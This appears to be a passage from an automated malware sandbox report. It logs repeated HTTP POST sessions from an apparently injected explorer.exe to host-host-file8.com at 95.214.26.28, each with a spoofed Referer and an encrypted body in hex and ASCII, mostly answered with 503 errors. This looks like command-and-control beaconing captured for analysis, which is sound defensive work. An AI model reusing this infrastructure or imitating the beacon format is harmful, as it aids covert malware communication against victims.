                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            19192.168.2.64974395.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:37:19.611892939 CET267OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://jyicmpi.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 294
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:37:19.611949921 CET267OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 33 83 b7 21
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d3!-fduq/VI'~jnWZt2}.9_BXB63ETG:sb:>CzzT#$[3?dpQ}"{Q?Kl1.c0jhI!(aca-W
                                                                                                                                                            Nov 10, 2023 15:37:19.918643951 CET267INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.64972595.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:44.418081045 CET237OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://tmugk.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 243
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:44.418103933 CET237OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 0d ce df 1d
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d*qqd46Q=w^mI<f;aN\nQv]O}a/?9FJ<aXP@oaNSB8(M>HTSC1SIX/~I'%) uQQy
                                                                                                                                                            Nov 10, 2023 15:36:44.727458954 CET238INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            20192.168.2.64974495.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:37:28.333453894 CET268OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://jbdwgxah.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 257
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:37:28.333476067 CET269OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 58 bc 98 1e
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]dX?}0FH,c-86QA.;Lt]BAT1TI+*6=1O6CzlZsI<wHbkPNjl#kVbbcaD\|4o[sD&
                                                                                                                                                            Nov 10, 2023 15:37:28.634603024 CET269INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            21192.168.2.64974595.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:37:40.159674883 CET270OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://hpfeeptar.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 222
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:37:40.159674883 CET270OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 39 c7 88 73
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d9sF0t0jiP`$7a}ns-~?=1q(X^sS%wn%,C;3'NL>^mU9TVFLVbq4xuV%/O
                                                                                                                                                            Nov 10, 2023 15:37:40.464581966 CET271INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            22192.168.2.64974695.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:37:43.242945910 CET271OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://ydikox.net/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 228
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:37:43.242981911 CET272OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 54 a9 be 75
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]dTuGCfQ`l&0P$qFGe~[7p+&9p9)w|oyLd#%&DA]-7I];SC1NqKmkZy%+IPOGz"W]
                                                                                                                                                            Nov 10, 2023 15:37:43.542344093 CET272INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            23192.168.2.64974795.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:37:49.217498064 CET273OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://qcunmavvat.net/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 265
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:37:49.217530012 CET273OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 3e c2 a0 1d
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d>q={b~'H,tB0O'E4L1UQInPvmINL<_?c#x8_EPY_5+?P|n? %Pk%K;
                                                                                                                                                            Nov 10, 2023 15:37:58.217103958 CET274INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 10 Nov 2023 14:37:58 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 36 31 0d 0a 5d 00 00 00 7b fa f2 1f b5 69 2b 38 4f e0 1a 9e dd a8 80 43 13 9c d0 5a 0f 7f 06 e0 b5 d6 fd e5 10 a9 1d d2 76 bf 53 5e da 04 ff e8 3d ef 26 5c 1f f2 fc d8 5a a3 06 9b 5d ca f9 6b dd 66 ab ec d1 5a 34 f9 e7 15 7a a0 fe ed 3d a3 87 ec 06 fc 31 c8 91 69 13 41 6b 5f 0f c5 f3 77 fd b7 4e cd a8 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 61]{i+8OCZvS^=&\Z]kfZ4z=1iAk_wN0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            24192.168.2.64974895.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:37:58.530220032 CET275OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://kibrkvnbk.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 353
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:37:58.530267954 CET275OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 2f c5 ac 60
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d/`mq5n/\Sacf&bua5FF\/3ch*BSo!%CesA]_)?`x3`7TEdMW(eh``v$Q{SK?"-
                                                                                                                                                            Nov 10, 2023 15:38:18.833267927 CET276INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            25192.168.2.64974995.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:19.162352085 CET277OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://rihjsppp.net/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:19.162381887 CET277OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 9f 66 5d 02 c8 a1 c1 64 31 db c0 7d
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d1}/ ?fGdJItlO6e3(GUQtPGI2.kFXxYGGrCH"Qx}`N,|a.[Ie?uYEY:TNQ


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            26192.168.2.64975095.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:27.253597975 CET278OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://mogop.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 153
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:27.253628016 CET278OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 9c 66 5d 02 c8 a1 c1 64 22 ca 9a 72
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d"rEdpy0Jf"M,[snf\c",>^ B3^S5T\H&0AH`
                                                                                                                                                            Nov 10, 2023 15:38:27.555083036 CET279INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            27192.168.2.64975195.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:27.868868113 CET279OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://ebswgoa.net/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 274
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:27.868921041 CET280OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 9d 66 5d 02 c8 a1 c1 64 4c ad d7 6a
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]dLj.z`E\wx_W<<ubhXA.Nw\q8;J]J$WCiGR'PdDEH.>;x/3|dU%AkD5XA_D7<u$Lr'+Z
                                                                                                                                                            Nov 10, 2023 15:38:28.170010090 CET280INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            28192.168.2.64975295.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:28.493575096 CET281OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://hodjcq.net/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 113
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:28.493601084 CET281OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 9a 66 5d 02 c8 a1 c1 64 46 85 d7 25
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]dF%'Km(ZV0JJ~sdDV
                                                                                                                                                            Nov 10, 2023 15:38:28.794945002 CET281INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            29192.168.2.64975395.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:29.108978033 CET282OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://vrhgpp.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 322
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:29.109035969 CET283OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 9b 66 5d 02 c8 a1 c1 64 2d c9 a5 72
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d-rGg{mPyu0-?X@bN|Ql)EK!+#Ca<rfW:LNK~~)wOjeN0YoI#[gr?AjYmuroP%H}KT.ri`I^
                                                                                                                                                            Nov 10, 2023 15:38:29.406418085 CET283INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            3192.168.2.64972695.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:45.114145041 CET238OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://rpfwsaim.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 165
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:45.114195108 CET238OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 2a 9e b7 74
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d*tIFa03~]5N>s!='KRg9COYqQc.XNMEAx
                                                                                                                                                            Nov 10, 2023 15:36:45.415339947 CET239INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            30192.168.2.64975495.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:29.724538088 CET283OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://mqetfsc.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 219
                                                                                                                                                            Host: host-host-file8.com
